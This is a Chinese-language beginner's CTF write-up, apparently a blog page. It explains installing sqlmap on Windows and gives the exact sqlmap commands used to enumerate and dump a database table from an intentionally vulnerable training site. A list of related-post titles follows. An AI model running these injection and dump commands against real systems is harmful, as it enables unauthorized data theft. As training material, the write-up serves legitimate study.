查看这道题先登陆“实验吧”,地址为 http://www.shiyanbar.com/ctf/33 。

这是一道十分基础的web题目,因为我也是刚刚接触ctf,记录一下第一道题的解题过程,算是自己的一个回顾吧,同时也给一些想要入门的朋友一点点微弱的参考吧。

一、sqlmap的安装

在windows下安装sqlmap需要先下载适用windows的sqlmap版本和python。

sqlmap的下载地址为:https://github.com/sqlmapproject/sqlmap/tarball/master。

python下载地址为:https://www.python.org/。我的python用的是2.7版本。

安装好python后, 在python文件目录下新建一个sqlmap文件夹。sqlmap的压缩包解压后能得到下图文件夹,将里面的内容复制到新建的文件夹sqlmap下面。

在sqlmap目录下打开cmd,输入python  sqlmap.py --version 测试是否安装成功。

如果结果为上图,说明安装成功。

二、使用sqlmap解题

首先cmd到之前的sqlmap目录下,输入python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --current-db 。引号内是存在注入点的网址。

运行后,得到数据库名称 my_db

然后查看一下表,输入python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db --tables。

发现有一个thiskey表,猜测需要的信息就藏在thiskey中,于是输入python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey --columns。

得到一个txt类型的k0y,然后再dump出来就完事了。

输入python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -C k0y --dump

得到k0y的值。

实验吧ctf题库:这个看起来有点简单!相关推荐

  1. 实验吧CTF题库-密码学(部分)

    这里没有key: 打开链接,有一个弹窗 然后就是一个空白网页,右键查看源代码 这里有一串js密文,解密一下,https://www.dheart.net/decode/index.php 得到flag ...

  2. CTF题库—实验吧(密码学)之疑惑的汉字

    版权声明:如果对大家有帮助,大家可以自行转载的.原文链接: https://blog.csdn.net/qq_37992321/article/details/84573915 1.首先点开解题链接: ...

  3. CTF题库实验吧分道扬镳 (注意进入正确的流程,用最短的步骤走完迷宫。)

    用 IDA 打开 od打开发现不会调试 白学了 找到这两个关键函数 反编译得到 代码 char *sub_401020() {char *result; // eaxchar *v1; // [esp ...

  4. CTF题库—实验吧(密码学)之困在栅栏里的凯撒

    版权声明:如果对大家有帮助,大家可以自行转载的.原文链接: https://blog.csdn.net/qq_37992321/article/details/84574878 1.先看看题目:困在栅 ...

  5. CTF题库实验吧女神 (猫流大大发现一个女神,你能告诉我女神的名字么(名字即是flag))

    下载后解压得到 直接用notepad++ 打开 nvshen.txt 可以看出来应该是 base64加密过的 1.直接进行解密 (notepad居然带有解密工具) (记得要全选中才行) 得到了  pn ...

  6. ctf题库--1000

    <题目> 答案格式:CTF{} 解题链接: http://ctf5.shiyanbar.com/misc/1000.exe <解答> 打开题目链接下载文件,打开exe,在输入密 ...

  7. CTF题库疑惑的汉字

    现有一段经过加密的密文,内容如下:  王夫 井工 夫口 由中人 井中 夫夫 由中大  请找出这段密文隐藏的消息明文. 一看这几个字我就知道是当铺密码 不知道为什么哈哈哈哈哈哈 (当铺密码 就是一种将中 ...

  8. CTF题库奇妙的音乐

    据说flag就藏在这段音乐中,请仔细听. 格式:CTF{} 我们下载压缩包加压后 看到 还有一个压缩包是需要密码才可以 解压的 图片是这样的 我觉得提示的已经够明显了   海伦凯勒的<假如给我三 ...

  9. ctf题库--这是什么鬼东西

    <题目> what a fuck!这是什么鬼东西? 解题链接: http://ctf5.shiyanbar.com/DUTCTF/1.html <过程> 打开链接,弹出的是一堆 ...

  10. CTF题库RSA实践 (RSA-Tool2 by tE! 工具的使用)

    在一次RSA密钥对生成中,假设p=473398607161,q=4511491,e=17 求解出d 将得到的d提交 这道题说实话应该不难的   就应该看一看  RSA算法 这里先分享一个工具 RSA- ...

最新文章

  1. android weight(权重)的具体分析
  2. java integer int 比较_java Integer和int之间的比较问题是什么?
  3. JAVA就业指导(转)
  4. java1.5连接oracle12c_java1.5连接oracle12c
  5. shell中的条件语句
  6. iOS应用跳转qq指定联系人聊天
  7. 加州圣地亚哥电子和计算机工程研究生申请入口
  8. C# 通过pid获取hwnd / 通过pid查找hwnd
  9. matlab 图像旋转补色,旋转互补色光学错觉
  10. 手把手教你学Dapr - 6. 发布订阅
  11. linux提权辅助工具(二):linux-exploit-suggester-2.pl
  12. 7-11 名人堂与代金券 (25 分)
  13. Python爬虫教程之Scrapy 框架
  14. QQ 二十年沉浮起落,黑产从未缺席
  15. FISCO BCOS 数据结构与编码协议 交易结构 区块结构
  16. ASO关键词排名的三种优化方式,aso关键词排名优化是
  17. 国培计算机网络技术培训心得,2017国培学习心得体会及感受
  18. 首金奥运健儿杨倩,获得金牌和奖金缴纳个税吗?雅戈尔赠送她一套房,交税吗?
  19. GitHub网页版提交PR
  20. 4.28 前端开发日报

热门文章

  1. Mqtt精髓系列之保留消息Retained Messages
  2. Mysql-DQL基础查询
  3. 错误:There was a problem confirming the ssl certificate: [SSL: CERTIFICATE_VERIFY_FAILED] certificate
  4. luogu1378 油滴扩展 (深搜)
  5. 台式电脑经常碰到的一些问题
  6. nova云主机evacuate简单分析
  7. BZOJ 1189([HNOI2007]紧急疏散evacuate-网络流二分+拆点)
  8. 基于VGGFace2的人脸性别年龄检测系统(源码&教程)
  9. java中以yyyyMMddHHmmss格式取得系统时间
  10. PAT 1007(简单粗暴)